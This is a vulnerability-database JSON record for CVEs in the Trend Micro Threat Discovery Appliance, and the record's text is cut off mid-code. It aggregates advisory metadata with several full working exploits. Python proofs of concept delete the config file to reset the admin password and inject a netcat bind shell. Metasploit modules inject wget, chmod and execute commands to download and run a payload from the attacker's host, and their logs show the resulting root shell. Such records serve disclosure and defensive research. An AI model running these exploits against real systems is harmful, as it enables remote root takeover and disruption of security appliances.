"baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-28T19:59:00", "type": "cve", "title": "CVE-2016-8589", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8589"], "modified": "2017-05-10T16:13:00", "cpe": ["cpe:/a:trendmicro:threat_discovery_appliance:2.6.1062"], "id": "CVE-2016-8589", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8589", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2017-04-20T03:25:30", "description": "", "published": "2017-04-20T00:00:00", "type": "packetstorm", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 logoff.cgi Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552"], "modified": "2017-04-20T00:00:00", "id": "PACKETSTORM:142225", "href": "https://packetstormsecurity.com/files/142225/Trend-Micro-Threat-Discovery-Appliance-2.6.1062r1-logoff.cgi-Directory-Traversal.html", "sourceData": "`#!/usr/local/bin/python \n\"\"\" \nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability \nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso \nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9 
\nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 \n \nSummary: \n======== \n \nThere exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. \nThis can result in an attacker causing a DoS or bypassing authentication. \n \nExploitation: \n============= \n \nAn attacker can use this vulnerability to bypass the authentication by resetting the default password back to 'admin'. \n \n1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf \n2. Wait for the server to be rebooted... \n \nIt is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby \nnobody can even log in... (since the MD5-hashed password is stored in the config file). Note that this step is destructive: \nthe appliance's config file is deleted, so do not run it against a system you are not authorized to disrupt. \n \nNotes: \n====== \n \n- (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience) \n- No username required! \n \nExample: \n======== \n \nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py \n(+) usage: ./poc.py <target> <option [reset][login]> \n(+) eg: ./poc.py 172.16.175.123 reset \n(+) eg: ./poc.py 172.16.175.123 login \nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login \n(-) login failed \nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset \n(+) resetting the default password... \n(+) success! now wait for a reboot... \nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login \n(+) logged in... 
\n(+) authenticated session_id: de685c4feec6d698f8165a8af8489df1 \n \n\"\"\" \n \nimport re \nimport os \nimport sys \nimport time \nimport requests \nimport threading \n \nrequests.packages.urllib3.disable_warnings() \n \nif len(sys.argv) != 3: \nprint \"(+) usage: %s <target> <option [reset][login]>\" % sys.argv[0] \nprint \"(+) eg: %s 172.16.175.123 reset\" % sys.argv[0] \nprint \"(+) eg: %s 172.16.175.123 login\" % sys.argv[0] \nsys.exit(-1) \n \nt = sys.argv[1] \no = sys.argv[2] \n \nbu = \"https://%s/\" % t \nl_url = \"%scgi-bin/logon.cgi\" % bu \no_url = \"%scgi-bin/logoff.cgi\" % bu \n \nif o.lower() == \"login\": \n# default password \nr = requests.post(l_url, data={ \"passwd\":\"admin\", \"isCookieEnable\":1 }, verify=False) \nif \"frame.cgi\" in r.text: \nprint \"(+) logged in...\" \nmatch = re.search(\"session_id=(.*); path\", r.headers['set-cookie']) \nif match: \nprint \"(+) authenticated session_id: %s\" % match.group(1) \nelse: \nprint \"(-) login failed\" \nelif o.lower() == \"reset\": \nprint \"(+) resetting the default password...\" \nr = requests.get(o_url, cookies={\"session_id\":\"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"}, verify=False) \n# causes an uninitialized free() vulnerability as well... \nif \"Memory map\" in r.text: \nprint \"(+) success! 
now wait for a reboot...\" \nelse: \nprint \"(-) not a valid option!\" \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142225/tmtda261062rllo-traversal.txt"}, {"lastseen": "2017-04-19T01:27:17", "description": "", "published": "2017-04-19T00:00:00", "type": "packetstorm", "title": "Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552", "CVE-2016-7547"], "modified": "2017-04-19T00:00:00", "id": "PACKETSTORM:142201", "href": "https://packetstormsecurity.com/files/142201/Trend-Micro-Threat-Discovery-Appliance-admin_sys_time.cgi-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution', \n'Description' => %q{ \nThis module exploits two vulnerabilities in the Trend Micro Threat Discovery Appliance. \nThe first is an authentication bypass vulnerability via a file delete in logoff.cgi \nwhich resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). \nThe second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi \ninterface (CVE-2016-7547; note that the researchers' own advisory list assigns the \nadmin_sys_time.cgi command injection to CVE-2016-8585 and CVE-2016-7547 to the \ndlp_policy_upload.cgi information disclosure, so verify the identifier before reporting). \n \nNote: You have the option to use the authentication bypass or not since it requires \nthat the server is rebooted. The password reset deletes the appliance's config file, which \nrenders the existing authentication useless (nobody can log in until the box is rebooted), \nso it is disruptive to the target. \nTypically, if an administrator can't log in, they will bounce the box. 
Therefore, this \nmodule performs a heart beat request until the box is bounced and then attempts to login \nand to perform the command injection. This module has been tested on version 2.6.1062r1 \nof the appliance. \n}, \n'Author' => \n[ \n'mr_me <steventhomasseeley@gmail.com>', # vuln + msf \n'Roberto Suggi Liverani @malerisch', # vuln + msf \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'URL', 'https://asciinema.org/a/112480'], # demo \n[ 'CVE', '2016-7552'], # auth bypass \n[ 'CVE', '2016-7547'], # cmdi \n], \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true, \n}, \n'Targets' => \n[ \n[ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ] \n], \n'DefaultOptions' => \n{ \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Apr 10 2017')) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'The target URI', '/']), \nOptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']), \nOptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), \nOptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]), \n \n], self.class) \nend \n \ndef check \nif do_login \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'), \n'cookie' => @cookie, \n'method' => 'GET', \n}, 1) \nif res and res.code == 200 and res.body =~ /About Trend Micro/ \nversion = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/ \ncase version \nwhen /2.6.1062/ \nreturn Exploit::CheckCode::Vulnerable \nend \nend \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nif datastore['AUTHBYPASS'] \nprint_status(\"Bypassing authentication...\") \nif reset_password \nprint_good(\"The password has been reset!\") \nprint_status(\"Waiting for the administrator to reboot...\") \npwn_after_reboot \nend \nelse \nif do_login \npwn \nelse \nfail_with(Failure::NoAccess, \"Authentication failed\") 
\nend \nend \nend \n \ndef reset_password \nc = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\" \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'), \n'method' => 'GET', \n'cookie' => c, \n}) \n \nif res and res.code == 200 and res.headers.to_s =~ /Backtrace/ \nreturn true \nend \nreturn false \nend \n \ndef pwn \nstart_http_server \nprint_good(\"Logged in\") \ndownload_exec \nend \n \ndef pwn_after_reboot \n@rebooted = false \nwhile !@rebooted \nif do_login \n@rebooted = true \npwn \nend \nend \nend \n \ndef on_request_uri(cli, request) \nif (not @pl) \nprint_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\") \nreturn \nend \nprint_status(\"#{rhost}:#{rport} - Sending the payload to the server...\") \n@elf_sent = true \nsend_response(cli, @pl) \nend \n \ndef start_http_server \n@pl = generate_payload_exe \n@elf_sent = false \n \ndownfile = rand_text_alpha(8+rand(8)) \nresource_uri = '/' + downfile \n \n# do not use SSL for the attacking web server \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \n \nif (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\") \nsrv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) \nelse \nsrv_host = datastore['SRVHOST'] \nend \n \n@service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri \nservice_url_payload = srv_host + resource_uri \n \nprint_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\") \nstart_service({'Uri' => { \n'Proc' => Proc.new { |cli, req| \non_request_uri(cli, req) \n}, \n'Path' => resource_uri \n}}) \n \ndatastore['SSL'] = true if ssl_restore \nconnect \nend \n \ndef exec(cmd) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'), \n'cookie' => @cookie, \n'method' => 'POST', \n'vars_post' => { \n'act' => 'save', \n'timezone' => cmd, \n} \n}, 1) \nend \n \ndef 
download_exec \n@bd = rand_text_alpha(8+rand(8)) \nregister_file_for_cleanup(\"/tmp/#{@bd}\") \nexec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\") \nexec(\"|`chmod 755 /tmp/#{@bd}`\") \nexec(\"|`/tmp/#{@bd}`\") \n \n# we need to delay, for the stager \nselect(nil, nil, nil, 5) \nend \n \ndef do_login \n \nbegin \nlogin = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'), \n'method' => 'POST', \n'vars_post' => { \n'passwd' => datastore['PASSWORD'], \n'isCookieEnable' => 1, \n} \n}) \n \n# these are needed due to the reboot \nrescue Rex::ConnectionRefused \nreturn false \nrescue Rex::ConnectionTimeout \nreturn false \nend \nif login and login.code == 200 and login.body =~ /frame\\.cgi/ \n@cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/ \nreturn true \nend \nreturn false \nend \nend \n=begin \nsaturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc \n[*] Processing scripts/trend.rc for ERB directives. \nresource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi \nresource (scripts/trend.rc)> set RHOST 192.168.100.2 \nRHOST => 192.168.100.2 \nresource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp \npayload => linux/x86/meterpreter/reverse_tcp \nresource (scripts/trend.rc)> set LHOST 192.168.100.13 \nLHOST => 192.168.100.13 \nresource (scripts/trend.rc)> exploit \n[*] Exploit running as background job. \n \n[*] Started reverse TCP handler on 192.168.100.13:4444 \n[*] Bypassing authentication... \nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > \n[+] The password has been reset! \n[*] Waiting for the reboot... \n[*] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ... \n[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP \n[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP \n[+] Logged in \n[*] 192.168.100.2:443 - Sending the payload to the server... 
\n[*] Transmitting intermediate stager for over-sized stage...(105 bytes) \n[*] Sending stage (1495599 bytes) to 192.168.100.2 \n[*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500 \n[+] Deleted /tmp/rpNDXQZTB \n[*] Server stopped. \n \nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1 \n[*] Starting interaction with 1... \n \nmeterpreter > shell \nProcess 3846 created. \nChannel 1 created. \n \n \nBusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash) \nEnter 'help' for a list of built-in commands. \n \n/bin/sh: can't access tty; job control turned off \n/opt/TrendMicro/MinorityReport/www/cgi-bin # id \nid \nuid=0(root) gid=0(root) \n/opt/TrendMicro/MinorityReport/www/cgi-bin # \n=end \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142201/trendmicro_threat_discovery_admin_sys_time_cmdi.rb.txt"}, {"lastseen": "2017-04-20T03:25:30", "description": "", "published": "2017-04-20T00:00:00", "type": "packetstorm", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dlp.cgi Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552", "CVE-2016-8590"], "modified": "2017-04-20T00:00:00", "id": "PACKETSTORM:142218", "href": "https://packetstormsecurity.com/files/142218/Trend-Micro-Threat-Discovery-Appliance-2.6.1062r1-log_query_dlp.cgi-Remote-Code-Execution.html", "sourceData": "`#!/usr/local/bin/python \n\"\"\" \nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Remote Code Execution Vulnerability \nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso \nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9 \nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 \n 
\nSummary: \n======== \n \nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root. \n \nNotes: \n====== \n \n- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was \nexec a bind shell using netcat. \n- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... \n- Auth is now bypassed, please see CVE-2016-7552 \n \nExample: \n======== \n \nsaturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py \n(+) usage: ./poc.py <target> <pass> \n(+) eg: ./poc.py 172.16.175.123 admin123 \nsaturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py 172.16.175.123 admin \n(+) logged in... \n(+) starting backdoor, this will take a few secs... \n(+) calling backdoor! \nid \nuid=0(root) gid=0(root) \nuname -a \nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown \nexit \n\"\"\" \n \nimport re \nimport os \nimport sys \nimport time \nimport requests \nimport threading \n \nrequests.packages.urllib3.disable_warnings() \n \nif len(sys.argv) != 3: \nprint \"(+) usage: %s <target> <pass>\" % sys.argv[0] \nprint \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0] \nsys.exit(-1) \n \nt = sys.argv[1] \np = sys.argv[2] \n \nbu = \"https://%s/\" % t \nl_url = \"%scgi-bin/logon.cgi\" % bu \ne_url = \"%scgi-bin/log_query_dlp.cgi\" % bu \n \ns = requests.Session() \n \ndef exec_bd(s, e_url): \n# now we setup our backdoor \n# no reverse, since it seems to fail !? \nnetcat = \"test|`nc -e /bin/sh -lp 1337`\" \ne_url += \"?act=search_advanced&cache_id=%s\" % netcat \ns.get(e_url, verify=False) \n \n# first we login... 
\nr = s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False) \nif \"frame.cgi\" in r.text: \nprint \"(+) logged in...\" \n \nthread = threading.Thread(target=exec_bd, args=(s, e_url,)) \nthread.start() \n \nprint \"(+) starting backdoor, this will take a few secs...\" \ntime.sleep(4) \n \nprint \"(+) calling backdoor!\" \nos.system(\"nc %s 1337\" % t) \n \nelse: \nprint \"(-) login failed\" \nsys.exit(-1) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142218/tmtda261062rllqp-exec.txt"}], "zdt": [{"lastseen": "2018-04-05T01:39:14", "description": "Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from a logoff.cgi directory traversal authentication bypass vulnerability.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "zdt", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 logoff.cgi Directory Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7552"], "modified": "2017-04-20T00:00:00", "id": "1337DAY-ID-27635", "href": "https://0day.today/exploit/description/27635", "sourceData": "#!/usr/local/bin/python\r\n\"\"\"\r\nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability\r\nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \r\nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso\r\nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9\r\nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1\r\n\r\nSummary:\r\n========\r\n\r\nThere exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. 
\r\nThis can result in an attacker causing a DoS or bypassing authentication.\r\n\r\nExploitation:\r\n=============\r\n\r\nAn attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'.\r\n\r\n1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf\r\n2. Wait for the server to be rebooted...\r\n\r\nIt is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby\r\nno-body can even login... (since the md5 hashed pw is stored in the config file).\r\n\r\nNotes:\r\n======\r\n\r\n- (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience)\r\n- No username required!\r\n\r\nExample:\r\n========\r\n\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <option [reset][login]>\r\n(+) eg: ./poc.py 172.16.175.123 reset\r\n(+) eg: ./poc.py 172.16.175.123 login\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login\r\n(-) login failed\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset\r\n(+) resetting the default password...\r\n(+) success! 
now wait for a reboot...\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login\r\n(+) logged in...\r\n(+) authenticated session_id: de685c4feec6d698f8165a8af8489df1\r\n\r\n\"\"\"\r\n\r\nimport re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <option [reset][login]>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 reset\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 login\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\no = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\no_url = \"%scgi-bin/logoff.cgi\" % bu\r\n\r\nif o.lower() == \"login\":\r\n # default password\r\n r = requests.post(l_url, data={ \"passwd\":\"admin\", \"isCookieEnable\":1 }, verify=False)\r\n if \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n match = re.search(\"session_id=(.*); path\", r.headers['set-cookie'])\r\n if match:\r\n print \"(+) authenticated session_id: %s\" % match.group(1)\r\n else:\r\n print \"(-) login failed\"\r\nelif o.lower() == \"reset\":\r\n print \"(+) resetting the default password...\"\r\n r = requests.get(o_url, cookies={\"session_id\":\"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"}, verify=False)\r\n # causes an uninitialized free() vulnerability as well...\r\n if \"Memory map\" in r.text:\r\n print \"(+) success! 
now wait for a reboot...\"\r\nelse:\r\n print \"(-) not a valid option!\"\n\n# 0day.today [2018-04-05] #", "sourceHref": "https://0day.today/exploit/27635", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-19T13:23:33", "description": "Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from a log_query_dae.cgi remote code execution vulnerability.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "zdt", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dae.cgi Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-8589"], "modified": "2017-04-20T00:00:00", "id": "1337DAY-ID-27630", "href": "https://0day.today/exploit/description/27630", "sourceData": "#!/usr/local/bin/python\r\n\"\"\"\r\nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Remote Code Execution Vulnerability\r\nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \r\nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso\r\nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9\r\nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1\r\n\r\nSummary:\r\n========\r\n\r\nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.\r\n\r\nNotes:\r\n======\r\n\r\n- Since this is a busybox, getting a connectback seemed hard. 
So, for this particular PoC, all I did was \r\nexec a bind shell using netcat.\r\n\r\n- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...\r\n- Auth is now bypassed, please see CVE-2016-7552\r\n\r\nExample:\r\n========\r\n\r\nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <pass>\r\n(+) eg: ./poc.py 172.16.175.123 admin123\r\nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py 172.16.175.123 admin\r\n(+) logged in...\r\n(+) starting backdoor, this will take a few secs...\r\n(+) calling backdoor!\r\nid\r\nuid=0(root) gid=0(root)\r\nuname -a\r\nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown\r\n\"\"\"\r\n\r\nimport re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <pass>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\np = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\ne_url = \"%scgi-bin/log_query_dae.cgi\" % bu\r\n\r\ns = requests.Session()\r\n\r\ndef exec_bd(s, e_url):\r\n # now we setup our backdoor\r\n # no reverse, since it seems to fail !?\r\n netcat = \"test|`nc -e /bin/sh -lp 1338`\"\r\n e_url += \"?act=search_advanced&cache_id=%s\" % netcat\r\n s.get(e_url, verify=False)\r\n\r\n# first we login...\r\nr = s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False)\r\nif \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n thread = threading.Thread(target=exec_bd, args=(s, e_url,))\r\n thread.start()\r\n print \"(+) starting backdoor, this will take a few secs...\"\r\n time.sleep(4)\r\n print \"(+) calling backdoor!\"\r\n os.system(\"nc %s 1337\" % t)\r\nelse:\r\n print \"(-) login failed\"\r\n 
sys.exit(-1)\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/27630", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-07T19:50:45", "description": "This module exploits two vulnerabilities in the Trend Micro Threat Discovery Appliance. The first is an authentication bypass vulnerability via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi interface (CVE-2016-7547). Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted. The password reset will render the authentication useless. Typically, if an administrator can't log in, they will bounce the box. Therefore, this module performs a heartbeat request until the box is bounced and then attempts to log in and to perform the command injection. 
This module has been tested on version 2.6.1062r1 of the appliance.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-10T18:32:58", "type": "metasploit", "title": "Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7547", "CVE-2016-7552"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\n 'Description' => %q{\n This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\n The 
first is an authentication bypass vulnerability via a file delete in logoff.cgi\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi\n interface (CVE-2016-7547).\n\n Note: You have the option to use the authentication bypass or not since it requires\n that the server is rebooted. The password reset will render the authentication useless.\n Typically, if an administrator cant login, they will bounce the box. Therefore, this\n module performs a heartbeat request until the box is bounced and then attempts to login\n and to perform the command injection. This module has been tested on version 2.6.1062r1\n of the appliance.\n },\n 'Author' =>\n [\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\n [ 'CVE', '2016-7552'], # auth bypass\n [ 'CVE', '2016-7547'], # cmdi\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-04-10'))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'The target URI', 